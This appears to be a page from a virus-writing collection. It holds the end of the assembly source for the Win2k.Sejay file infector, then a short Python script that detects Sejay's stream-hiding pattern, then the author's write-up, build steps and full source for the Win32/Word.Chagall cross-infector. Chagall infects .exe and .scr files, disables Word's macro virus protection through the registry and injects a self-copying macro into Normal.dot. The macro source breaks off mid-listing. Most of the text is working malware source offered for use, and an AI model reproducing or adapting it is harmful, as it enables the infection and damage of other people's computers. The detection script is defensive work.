message Win32FindData.cFileName,\ ;append to this PayInfected ;payload message invoke lstrlen,\ ;get legth of string to write it in payload file eax ;pointer to buffer ^^^^ invoke WriteFile,\ ;write infected file to payload file dword [PayHandle],\ ;file handle Win32FindData.cFileName,\ ;filename + scary message eax,\ ;number of bytes to write PayBytesWritten,\ ;number of bytes written 0 ;no structure FindNextVictim: invoke DeleteFile,\ ;delete WinTempDir ;the temp file invoke FindNextFile,\ ;find more files to infect dword [FindHandle],\ ;handle from FindFirstFile Win32FindData ;structure jmp FindMoreFiles ;go get it! InfectDone: invoke CloseHandle,\ ;close find handle dword [FindHandle] ret ;back to call Datas: VirusFile rb 256d ;save here full path of virus file WinTempDir rb 256d ;to store temp files Victims db "*.exe",0 ;search for exe FindHandle dd ? ;save here handle to find exe files VictimStream rb 256d ;victim stream name TempFile db "Sejay.DiA",0 ;temp file FolderHandle dd ? ;handle for finding sub folders VictimFolder rb 256d ;save here folder to infect Folder db "*.*",0 ;find all (including folders) KazaaShare db "Software\Kazaa\Transfer",0 ;for kazza share folder infection KazaaRegHandle dd ? ;handle for reg key KazzaFolder db "DlDir0",0 ;value name KazaaVictim rb 255d ;save path here KazaaSize db 255d ;size of buffer StartupInfo STARTUPINFO ;structure already defined by fasm ProcessInfo PROCESS_INFORMATION ;... Win32FindData FINDDATA ;... Systemtime SYSTEMTIME ;... 
PayTempFile rb 256d PayFile db "Sejay.htm",0 PayHTMLhead db "<html><head><title>Win2k.Sejay</title></head><body text='#FF0000' bgcolor='#000000'><h1>YOUR COMPUTER IS INFECTED!</h1></body></html>",0 PayInfHeader db "<html><body>",0 PayInfected db " - <b>infected with Win2k.Sejay by DiA/rrlf</b><br></body></html>",0 PaySubkey db "Software\Microsoft\Internet Explorer\Main",0 PayIEStart db "Start Page",0 PayLyric db "Kings of the underground, hardest of the hardcore.",10,13 db "Bottles flyin' all around, bats are on the dance floor",10,13,10,13 db "Flames of hell surround me, blood is dripping down my face",10,13 db "The realife psychopaths, Bad luck will destroy this place.",10,13,10,13 db "...Like pussies you run.",10,13,"3 minutes, that's all, our set is done.",0 PayHandle dd ? PayBytesWritten dd ? PayRegHandle dd ? data import ;import api's library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ advapi32, "ADVAPI32.DLL" import kernel32,\ GetVersion, "GetVersion",\ GetModuleFileName, "GetModuleFileNameA",\ CreateProcess, "CreateProcessA",\ FindFirstFile, "FindFirstFileA",\ FindNextFile, "FindNextFileA",\ CopyFile, "CopyFileA",\ lstrcpy, "lstrcpyA",\ DeleteFile, "DeleteFileA",\ GetCommandLine, "GetCommandLineA",\ GetWindowsDirectory, "GetWindowsDirectoryA",\ lstrcat, "lstrcatA",\ lstrlen, "lstrlenA",\ CreateFile, "CreateFileA",\ WriteFile, "WriteFile",\ SetFilePointer, "SetFilePointer",\ CloseHandle, "CloseHandle",\ GetSystemTime, "GetSystemTime",\ GetCurrentDirectory, "GetCurrentDirectoryA",\ SetCurrentDirectory, "SetCurrentDirectoryA",\ ExitProcess, "ExitProcess" import user32,\ MessageBox, "MessageBoxA" import advapi32,\ RegOpenKeyEx, "RegOpenKeyExA",\ RegSetValueEx, "RegSetValueExA",\ RegQueryValueEx, "RegQueryValueExA",\ RegCloseKey, "RegCloseKey" end data ;-----Sejay.asm-----end----------------------------------------------------------------------------------------------------
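
The .description notes above say the original program is moved into a stream named after the four characters before ".exe" (Whatever.exe:ever, Victim.exe:ctim) while the main stream is overwritten. The following detection check is an added example, not part of the original source: it parses a `dir /r`-style listing and flags `.exe` files that carry such a stream. The sample listing is constructed, and the English "Directory of" header, the function names and the two size heuristics are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Main-stream sizes the page states for the virus body (unpacked / UPX-packed).
PAGE_BODY_SIZES = {5632, 3072}

# Constructed sample modelled on `dir /r` output (not captured from a real host).
SAMPLE_LISTING = r"""
 Directory of C:\Samples

08/17/2005  10:12 AM             3,072 Whatever.exe
                                45,056 Whatever.exe:ever:$DATA
08/17/2005  10:15 AM            61,440 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
08/17/2005  10:20 AM             5,632 Victim.exe
                               120,832 Victim.exe:ctim:$DATA
08/17/2005  10:21 AM            20,480 notes.txt
                                   512 notes.txt:meta:$DATA
"""

# "<date> <time> [AM|PM] <size> <name>" : the file's main (unnamed) stream.
FILE_RE = re.compile(r"^\S+\s+\S+(?:\s+[AP]M)?\s+([\d.,]+)\s+(.+?)\s*$")
# "<indent> <size> <name>:<stream>:$DATA" : an alternate data stream.
STREAM_RE = re.compile(r"^\s+([\d.,]+)\s+(.+):([^:]+):\$DATA\s*$")


@dataclass
class Finding:
    path: str
    stream: str
    main_size: int
    stream_size: int
    reasons: list


def _to_int(size_text):
    """Drop locale thousands separators from a size column."""
    return int(re.sub(r"\D", "", size_text))


def find_stream_companions(listing):
    """Return a Finding for every .exe whose stream name follows the page's rule."""
    directory = ""
    main_sizes = {}  # lower-cased file name -> main stream size, per directory
    findings = []
    for line in listing.splitlines():
        stripped = line.strip()
        if stripped.startswith("Directory of "):  # assumption: English locale
            directory = stripped[len("Directory of "):]
            main_sizes = {}
            continue
        m = FILE_RE.match(line)
        if m:
            main_sizes[m.group(2).lower()] = _to_int(m.group(1))
            continue
        m = STREAM_RE.match(line)
        if not m:
            continue
        stream_size, name, stream = _to_int(m.group(1)), m.group(2), m.group(3)
        stem, dot, ext = name.rpartition(".")
        if not dot or ext.lower() != "exe" or len(stem) < 4:
            continue
        # Core rule from the page: stream name == 4 characters before ".exe".
        if stream.lower() != stem[-4:].lower():
            continue
        reasons = ["stream name equals the 4 characters before .exe"]
        main_size = main_sizes.get(name.lower(), -1)
        if main_size in PAGE_BODY_SIZES:
            reasons.append("main stream size matches a size stated on the page")
        if 0 <= main_size < stream_size:
            # Heuristic: the displaced program is usually larger than the stub.
            reasons.append("hidden stream is larger than the main stream")
        path = directory.rstrip("\\") + "\\" + name if directory else name
        findings.append(Finding(path, stream, main_size, stream_size, reasons))
    return findings


if __name__ == "__main__":
    for hit in find_stream_companions(SAMPLE_LISTING):
        print(f"{hit.path}:{hit.stream}  main={hit.main_size} "
              f"stream={hit.stream_size}  {'; '.join(hit.reasons)}")
```

On a live system the input would be the saved output of `dir /r /s`; the Sejay.DiA and Sejay.htm files the page places in the Windows directory are further artifacts to check alongside any hit.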

Win32/Word.Chagall DiA ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Win32/Word.Chagall - by DiA/rrlf ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ====================================== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; DiA_hates_machine@gmx.de ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; http://www.vx-dia.de.vu ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; 22.05.2k5 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Disclaimer: Attention! With this source code files you can make a living and working virus! I am NOT responsible for any damage you make with this bug! DO NEVER spread viruses or worms! It will bring trouble! This is just for education. TAKE CARE! Intro: Welcome to my first cross infector. This bug will infect executables at win32 environment and microsoft word documents. It took me a long time to finish this because i had no fun coding that vba/vbs stuff :D. But finally it's finished and i hope you have much fun with it. Description: Most cross infectors for PE/DOC i saw was nearly same thing, the word infection part was inside the exe in the data section. But i want (as always) make somethin new. So i decided to make two parts of the virus and then join it together. It works good, but need for a really good virus some more features, like encrypt the host file, encrypt the word part, just in one word encrypt the whole virus. Maybe later... Ok, now i will tell you from two situations how Chagall worx, one time from a .exe started, and other time from a .doc . 
Win32 Part: From a .exe or .scr started the virus will make following, step by step: - read Win32 part into memory - read Host file into memory - read Word part into memory - write host from memory to disk under name of infected file .sys - set attribute hidden to this .sys file - execute the host - infect files in current folder, windows folder and system folder - infect .exe and .scr files - keep file attributes and file time - infected file will look like this: #################### # Virus Win32 part # #################### #################### # Host file # #################### #################### # Virus Word part # #################### - check if word is running, if so dont infect Normal.dot because user will notice that somethin happends to Word - drop the Word part from memory to disk in the windows folder - make a copy of the virus in windows folder, Win32 part + Word part - execute the .vbs file, that will insert the Word part code into Normal.dot - delete this .vbs file - check for payload date, if it is 30.06. show a simple message box - exit virus Word Part: Let's say the virus comes from a .doc file into not infected system: - execute code when a document get's closed - read virus, Win32 part + Word part, from a variable inside the doc - write the virus to drive C:\ as Chag32.exe - execute this file, it will infect all .exe and .scr files, and then infect also the Nomal.dot - that makes the Word part not a typical macro virus, active infect normal, normal infect active - it is like a circle, active drop Win32 part, Win32 part infect normal and normal infect other active documents - nothin really great this Word part, no stealth, no encryption... just that it work, maybe someone want to make an advanced macro part? - please see Word part for more informations ;P Make a working Chagall: Hehe, because there are two parts it's not just like assemble and run kiddies :P. Save all in one folder, Chagall.asm, Chagall.vbs, size.equ and Joiner.asm . 
Then assemble Chagall.asm with FASM (www.flatassembler.org) and assemble Joiner.asm too. Now you have Chagall.exe, Chagall.vbs and Joiner.exe in one folder. run Joiner.exe and output should be ReadyChagall.exe. Attention, this is the working virus. Take care. Outro: I am proud to finish this bug, I hope you enjoy the code! Greets fly's out to all my real and cyber friends, to you the reader and to my mom, the name Chagall was her idea, it was some artist (like my mom) who makes gnaaarly pictures. For greets or fucks feel free to drop me a mail or make a guestbook entry at my page. Have a great day, and we see us in my next creation... ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Win32/Word.Chagall - by DiA/rrlf ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ====================================== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; DiA_hates_machine@gmx.de ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; http://www.vx-dia.de.vu ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; 22.05.2k5 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EXE Part - Chagall.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; include "%fasminc%\win32ax.inc" include "size.inc" Chagall: call LoadInMem call ExecuteHost invoke GetCurrentDirectory,\ 256d,\ CurrentDir mov ebx, CurrentDir call MakePathValid mov ebx, CurrentDir mov ecx, 10d mov edx, ExeFiles call InfectFiles mov ebx, CurrentDir mov ecx, 10d mov edx, ScrFiles call InfectFiles invoke GetWindowsDirectory,\ WindowsDir,\ 256d mov ebx, WindowsDir call MakePathValid mov ebx, WindowsDir mov ecx, 15d mov edx, ExeFiles call InfectFiles mov ebx, WindowsDir mov ecx, 15d mov edx, ScrFiles call InfectFiles invoke 
GetSystemDirectory,\ SystemDir,\ 256d mov ebx, SystemDir call MakePathValid mov ebx, SystemDir mov ecx, 20d mov edx, ExeFiles call InfectFiles mov ebx, SystemDir mov ecx, 20d mov edx, ScrFiles call InfectFiles call IsWordRunning cmp ecx, SomethinFalse je Exit call DropWordInfector Exit: call LoadOutMem call Payload invoke ExitProcess,\ 0 ;*****LoadInMem*****Procedure*************************** LoadInMem: ;load virus (PE/DOC) and host in memory invoke GetModuleFileName,\ 0,\ HostFileName,\ 256d mov edx, OPEN_EXISTING mov ecx, GENERIC_READ mov ebx, HostFileName call OpenFile mov dword [HostFileHandle], eax cmp ecx, SomethinFalse je LoadInMemError mov edx, VirusMemHandle mov ebx, VirusMemStart mov ecx, VirusSize call GetMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle mov ecx, VirusMemStart mov edx, VirusSize call ReadInMem cmp ecx, SomethinFalse je LoadInMemError invoke GetFileSize,\ dword [HostFileHandle],\ 0 sub eax, VirusSize sub eax, WordDropSize cmp eax, 0 je ReadWordDropper mov dword [HostFileSize], eax mov edx, HostMemHandle mov ebx, HostMemStart mov ecx, dword [HostFileSize] call GetMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle mov ecx, HostMemStart mov edx, dword [HostFileSize] call ReadInMem cmp ecx, SomethinFalse je LoadInMemError ReadWordDropper: mov edx, WordMemHandle mov ebx, WordMemStart mov ecx, WordDropSize call GetMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle mov ecx, WordMemStart mov edx, WordDropSize call ReadInMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle call CloseHand LoadInMemError: mov ecx, SomethinFalse jmp LoadInMemReturn LoadInMemEnd: mov ecx, 0 LoadInMemReturn: ret ;*****LoadInMem*****Procedure***end********************* ;*****OpenFile*****Procedure**************************** OpenFile: invoke CreateFile,\ ebx,\ ;edx - flags (CREATE_ALWAYS...OPEN_EXISTING) ecx,\ ;ebx - filename to open FILE_SHARE_READ + FILE_SHARE_WRITE,\ ;ecx - GENERIC_READ .. 
GENERIC_WRITE 0,\ edx,\ ;open or create? FILE_ATTRIBUTE_NORMAL,\ 0 cmp eax, INVALID_HANDLE_VALUE jne OpenFileEnd mov ecx, SomethinFalse jmp OpenFileReturn OpenFileEnd: mov ecx, 0 OpenFileReturn: ret ;*****OpenFile*****Procedure***end********************** ;*****GetMem*******Procedure**************************** GetMem: invoke GlobalAlloc,\ ;edx - pointer to handle GMEM_MOVEABLE,\ ;ebx - pointer to start address ecx ;ecx - size of memory to get mov dword [edx], eax cmp eax, 0 je GetInMemError invoke GlobalLock,\ dword [edx], mov dword [ebx], eax cmp eax, 0 jne GetInMemEnd GetInMemError: mov ecx, SomethinFalse jmp GetInMemReturn GetInMemEnd: mov ecx, 0 GetInMemReturn: ret ;*****GetMem++*****Procedure***end********************** ;*****ReadInMem*****Procedure*************************** ReadInMem: invoke ReadFile,\ ;ebx - pointer to file handle dword [ebx],\ ;ecx - pointer to start address dword [ecx],\ ;edx - size to read edx,\ BytesRead,\ 0 cmp eax, 0 jne ReadInMemEnd mov ecx, SomethinFalse jmp ReadInMemReturn ReadInMemEnd: mov ecx, 0 ReadInMemReturn: ret ;*****ReadInMem*****Procedure*************************** ;*****CloseHand*****Procedure*************************** CloseHand: invoke CloseHandle,\ ;ebx - handle to close dword [ebx] ret ;*****CloseHand*****Procedure***end********************* ;*****ExecuteHost*****Procedure************************* ExecuteHost: mov ebx, HostFileName call GetEndOfString mov dword [ebx - 3d], "sys" invoke SetFileAttributes,\ HostFileName,\ FILE_ATTRIBUTE_NORMAL mov edx, CREATE_ALWAYS mov ecx, GENERIC_WRITE mov ebx, HostFileName call OpenFile mov dword [HostFileHandle], eax cmp ecx, SomethinFalse je ExecuteHostError mov ebx, HostFileHandle mov edx, HostMemStart mov ecx, dword [HostFileSize] call WriteToFile cmp ecx, SomethinFalse je ExecuteHostError mov ebx, HostFileHandle call CloseHand invoke SetFileAttributes,\ HostFileName,\ FILE_ATTRIBUTE_HIDDEN invoke GetCommandLine mov ebx, HostFileName mov edx, eax call ExecuteThis cmp ecx, 
SomethinFalse jne ExecuteHostEnd ExecuteHostError: mov ecx, SomethinFalse jmp ExecuteHostReturn ExecuteHostEnd: mov ecx, 0 ExecuteHostReturn: ret ;*****ExecuteHost*****Procedure***end******************* ;*****WriteToFile*****Procedure************************* WriteToFile: invoke WriteFile,\ dword [ebx],\ ;ebx - file handle dword [edx],\ ;edx - start address of buffer ecx,\ ;ecx - size to write BytesWrite,\ 0 cmp eax, 0 jne WriteToFileEnd mov ecx, SomethinFalse jmp WriteToFileReturn WriteToFileEnd: mov ecx, 0 WriteToFileReturn: ret ;*****WriteToFile*****Procedure***end******************* ;*****ExecuteThis*****Procedure************************* ExecuteThis: invoke CreateProcess,\ ebx,\ ;ebx - pointer to file to execute edx,\ ;edx - pointer to commandline 0,\ 0,\ 0,\ CREATE_NEW_CONSOLE,\ 0,\ 0,\ Startup,\ Process cmp eax, 0 jne ExecuteThisEnd mov ecx, SomethinFalse jmp ExecuteThisReturn ExecuteThisEnd: mov ecx, 0 ExecuteThisReturn: ret ;*****ExecuteThis*****Procedure***end******************* ;*****InfectFiles*****Procedure************************* InfectFiles: mov dword [InfectCount], ecx push edx invoke SetCurrentDirectory,\ ebx ;ebx - directory to infect ;ecx - infection counter cmp eax, 0 ;edx - pointer to victim string je InfectFilesError pop edx invoke FindFirstFile,\ edx,\ Win32FindData mov dword [FindHandle], eax FindMoreFiles: cmp eax, 0 je NoMoreFiles cmp dword [InfectCount], 0 je NoMoreFiles invoke GetFileAttributes,\ Win32FindData.cFileName mov dword [VictimAttributes], eax invoke SetFileAttributes,\ Win32FindData.cFileName,\ FILE_ATTRIBUTE_NORMAL mov edx, OPEN_EXISTING mov ecx, GENERIC_READ + GENERIC_WRITE mov ebx, Win32FindData.cFileName call OpenFile mov dword [VictimHandle], eax cmp ecx, SomethinFalse je FindNextVictim invoke GetFileTime,\ dword [VictimHandle],\ Filetime,\ Filetime,\ Filetime invoke GetFileSize,\ dword [VictimHandle],\ 0 mov dword [VictimSize], eax mov edx, VictimMemHandle mov ebx, VictimMemStart mov ecx, dword [VictimSize] call GetMem 
cmp ecx, SomethinFalse je FindNextVictim mov ebx, VictimHandle mov ecx, VictimMemStart mov edx, dword [VictimSize] call ReadInMem cmp ecx, SomethinFalse je FindNextVictim mov ebx, dword [VictimMemStart] mov ecx, dword [VictimSize] GetInfectionMark: cmp dword [ebx], "CHAG" je FindNextVictim dec ecx cmp ecx, 0 je InfectThisFile inc ebx jmp GetInfectionMark InfectThisFile: invoke SetFilePointer,\ dword [VictimHandle],\ 0,\ 0,\ FILE_BEGIN mov ebx, VictimHandle mov edx, VirusMemStart mov ecx, VirusSize call WriteToFile cmp ecx, SomethinFalse je FindNextVictim mov ebx, VictimHandle mov edx, VictimMemStart mov ecx, dword [VictimSize] call WriteToFile cmp ecx, SomethinFalse je FindNextVictim mov ebx, VictimHandle mov edx, WordMemStart mov ecx, WordDropSize call WriteToFile FindNextVictim: invoke SetFileTime,\ dword [VictimHandle],\ Filetime,\ Filetime,\ Filetime mov ebx, VictimHandle call CloseHand invoke SetFileAttributes,\ Win32FindData.cFileName,\ dword [VictimAttributes] dec dword [InfectCount] invoke FindNextFile,\ dword [FindHandle],\ Win32FindData jmp FindMoreFiles NoMoreFiles: mov ebx, FindHandle call CloseHand mov ecx, 0 jmp InfectFilesReturn InfectFilesError: mov ecx, SomethinFalse InfectFilesReturn: ret ;*****InfectFiles*****Procedure***end******************* ;*****FreeMem*****Procedure***************************** FreeMem: invoke GlobalUnlock,\ ;ebx - handle to mem to free dword [ebx] invoke GlobalFree,\ dword [ebx] FreeMemEnd: ret ;*****FreeMem*****Procedure***end*********************** ;*****LoadOutMem*****Procedure************************** LoadOutMem: mov ebx, VirusMemHandle call FreeMem mov ebx, HostMemHandle call FreeMem mov ebx, WordMemHandle call FreeMem mov ebx, VictimMemHandle call FreeMem ret ;*****LoadOutMem*****Procedure***end********************* ;*****IsWordRunning*****Procedure************************ IsWordRunning: invoke Sleep,\ 20000 ;sleep 20 seconds, maybe word gets now closed invoke CreateToolhelp32Snapshot,\ ;check if word is running 2,\ 
;if so dont infect normal.dot 0 ;because its in use mov dword [SnapHandle], eax mov dword [ProcessEntry], sizeof.PROCESSENTRY32 invoke Process32First,\ dword [SnapHandle],\ ProcessEntry FindNextProcess: cmp eax, 0 je NoWordIsRunning mov ebx, ProcessEntry.szExeFile call GetEndOfString cmp dword [ebx - 11d], "WINW" jne FindNextP cmp dword [ebx - 7d], "ORD." je WordIsRunning FindNextP: invoke Process32Next,\ dword [SnapHandle],\ ProcessEntry jmp FindNextProcess WordIsRunning: mov ecx, SomethinFalse jmp IsWordRunningReturn NoWordIsRunning: xor ecx, ecx IsWordRunningReturn: ret ;*****IsWordRunning*****Procedure***end****************** ;*****DropWordInfector*****Procedure********************* DropWordInfector: invoke GetWindowsDirectory,\ WindowsDirectory,\ 256d mov ebx, WindowsDirectory call MakePathValid invoke SetCurrentDirectory,\ WindowsDirectory cmp eax, 0 je DropWordInfectorError mov edx, CREATE_ALWAYS mov ecx, GENERIC_WRITE mov ebx, WordDropName call OpenFile mov dword [WordDropHandle], eax cmp ecx, SomethinFalse je DropWordInfectorError mov ebx, WordDropHandle mov edx, WordMemStart mov ecx, WordDropSize call WriteToFile cmp ecx, SomethinFalse je DropWordInfectorError mov ebx, WordDropHandle call CloseHand mov edx, CREATE_ALWAYS mov ecx, GENERIC_WRITE mov ebx, WordDropExe call OpenFile mov dword [WordExeHandle], eax mov ebx, WordExeHandle mov edx, VirusMemStart mov ecx, VirusSize call WriteToFile mov ebx, WordExeHandle mov edx, WordMemStart mov ecx, WordDropSize call WriteToFile mov ebx, WordExeHandle call CloseHand invoke ShellExecute,\ 0,\ WordDropExecute,\ WordDropName,\ 0,\ 0,\ SW_HIDE cmp eax, 32 jbe DropWordInfectorError invoke Sleep,\ 10000 invoke DeleteFile,\ WordDropName mov ecx, 0 jmp DropWordInfectorReturn DropWordInfectorError: mov ecx, SomethinFalse DropWordInfectorReturn: ret ;*****DropWordInfector*****Procedure***end*************** ;*****MakePathValid*****Procedure************************ MakePathValid: cmp byte [ebx], 0 ;ebx - pointer to path 
string je CheckValidness inc ebx jmp MakePathValid CheckValidness: cmp byte [ebx - 1], "\" je PathIsValid mov byte [ebx], "\" mov byte [ebx + 1], 0 PathIsValid: ret ;*****MakePathValid*****Procedure***end****************** ;*****GetEndOfString*****Procedure*********************** GetEndOfString: ;ebx - pointer to string cmp byte [ebx], 0 je HaveEndOfString inc ebx jmp GetEndOfString HaveEndOfString: ret ;*****GetEndOfString*****Procedure***end***************** ;*****Payload*****Procedure****************************** Payload: invoke GetSystemTime,\ SystemTime cmp word [SystemTime.wMonth], 06d jne PayloadReturn cmp word [SystemTime.wDay], 30d jne PayloadReturn invoke MessageBox,\ 0,\ PayloadCaption,\ PayloadText,\ MB_ICONWARNING PayloadReturn: ret ;*****Payload*****Procedure***end************************ Datas: HostFileName rb 256d HostFileHandle dd ? VirusMemHandle dd ? VirusMemStart dd ? BytesRead dd ? BytesWrite dd ? HostFileSize dd ? HostMemHandle dd ? HostMemStart dd ? WordMemHandle dd ? WordMemStart dd ? FindHandle dd ? VictimHandle dd ? VictimSize dd ? VictimMemHandle dd ? VictimMemStart dd ? CurrentDir rb 256d ExeFiles db "*.exe",0 ScrFiles db "*.scr",0 InfectCount dd ? VictimAttributes dd ? WindowsDirectory rb 256d WordDropName db "chagall.vbs",0 WordDropHandle dd ? WordDropExecute db "open",0 WordDropExe db "chag.wrd",0 WordExeHandle dd ? SnapHandle dd ? WindowsDir rb 256d SystemDir rb 256d PayloadCaption db "Win32/Word.Chagall Virus by DiA/rrlf",0 PayloadText db "Bad news for you: you are infected with a virus",10,13 db "Good news for me: its my birthday ;)",10,13 db "So be happy with me at this day, turn of the computer and open a beer...",10,13,10,13 db "Thanks, DiA/Ready Rangers Liberation Front",0 struct PROCESSENTRY32 .dwSize dd ? .cntUsage dd ? .th32ProcessID dd ? .th32DefaultHeapID dd ? .th32ModuleID dd ? .cntThreads dd ? .th32ParentProcessID dd ? .pcPriClassBase dd ? .dwFlags dd ? 
.szExeFile rb 260d ends Startup STARTUPINFO Process PROCESS_INFORMATION Win32FindData FINDDATA Filetime FILETIME ProcessEntry PROCESSENTRY32 SystemTime SYSTEMTIME data import library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ shell32, "SHELL32.DLL" import kernel32,\ GetModuleFileName, "GetModuleFileNameA",\ CreateFile, "CreateFileA",\ GlobalAlloc, "GlobalAlloc",\ GlobalLock, "GlobalLock",\ ReadFile, "ReadFile",\ GetFileSize, "GetFileSize",\ CloseHandle, "CloseHandle",\ WriteFile, "WriteFile",\ CreateProcess, "CreateProcessA",\ GetCommandLine, "GetCommandLineA",\ GetCurrentDirectory, "GetCurrentDirectoryA",\ SetCurrentDirectory, "SetCurrentDirectoryA",\ FindFirstFile, "FindFirstFileA",\ FindNextFile, "FindNextFileA",\ SetFilePointer, "SetFilePointer",\ GlobalUnlock, "GlobalUnlock",\ GlobalFree, "GlobalFree",\ GetFileAttributes, "GetFileAttributesA",\ SetFileAttributes, "SetFileAttributesA",\ GetFileTime, "GetFileTime",\ SetFileTime, "SetFileTime",\ GetWindowsDirectory, "GetWindowsDirectoryA",\ GetSystemDirectory, "GetSystemDirectoryA",\ DeleteFile, "DeleteFileA",\ Sleep, "Sleep",\ CopyFile, "CopyFileA",\ CreateToolhelp32Snapshot,"CreateToolhelp32Snapshot",\ Process32First, "Process32First",\ Process32Next, "Process32Next",\ GetSystemTime, "GetSystemTime",\ ExitProcess, "ExitProcess" import user32,\ MessageBox, "MessageBoxA" import shell32,\ ShellExecute, "ShellExecuteA" end data ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EXE Part - Chagall.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall VBS Part - Chagall.vbs ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; On Error Resume Next Set Word = WScript.CreateObject("Word.Application") Set Shell = 
CreateObject("WScript.Shell") Set N = Word.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule Word.Options.VirusProtection = False Word.Options.ConfirmConversion = False Word.Options.SaveNormalPrompt = False RegPath = "HKCU\Software\Microsoft\Office\" & Word.Application.Version & "\Word\Security\" Shell.RegWrite RegPath & "Level", 1, "REG_DWORD" Shell.RegWrite RegPath & "AccessVBOM", 1, "REG_DWORD" N.DeleteLines 1, N.CountOfLines N.InsertLines 1, "Private Sub Document_Close()" N.InsertLines 2, "On Error Resume Next" N.InsertLines 3, "Options.VirusProtection = False" N.InsertLines 4, "Options.SaveNormalPrompt = False" N.InsertLines 5, "Options.ConfirmConversions = False" N.InsertLines 6, "Set VirCode = NormalTemplate.VBProject.VBComponents(1).CodeModule" N.InsertLines 7, "Set ActiveD = ActiveDocument.VBProject.VBComponents(1)" N.InsertLines 8, "Set ActCode = ActiveD.CodeModule" N.InsertLines 9, "If ActiveD.Name = ""Chagall"" Then" N.InsertLines 10, "GoTo DropExe" N.InsertLines 11, "Else" N.InsertLines 12, "ActCode.DeleteLines 1, ActCode.CountOfLines" N.InsertLines 13, "ActCode.InsertLines 1, VirCode.Lines(1, VirCode.CountOfLines)" N.InsertLines 14, "ActiveD.Name = ""Chagall""" N.InsertLines 15, "End If" N.InsertLines 16, "DropExe:" N.InsertLines 17, "Dim AExeFile As String" N.InsertLines 18, "Dim NExeFile As String" N.InsertLines 19, "AExeFile = ActiveDocument.Variables(""llagahc"").Value" N.InsertLines 20, "NExeFile = Normal.ThisDocument.Variables(""llagahc"").Value" N.InsertLines 21, "If NExeFile = """" Then" N.InsertLines 22, "Open Environ(""WinDir"") & ""\Chag.wrd"" For Binary As #1" N.InsertLines 23, "NExeFile = Space(LOF(1))" N.InsertLines 24, "Get #1, , NExeFile" N.InsertLines 25, "Close #1" N.InsertLines 26, "Normal.ThisDocument.Variables.Add ""llagahc"", NExeFile" N.InsertLines 27, "End If" N.InsertLines 28, "If AExeFile = """" Then" N.InsertLines 29, "ActiveDocument.Variables.Add ""llagahc"", NExeFile" N.InsertLines 30, "End If" N.InsertLines 
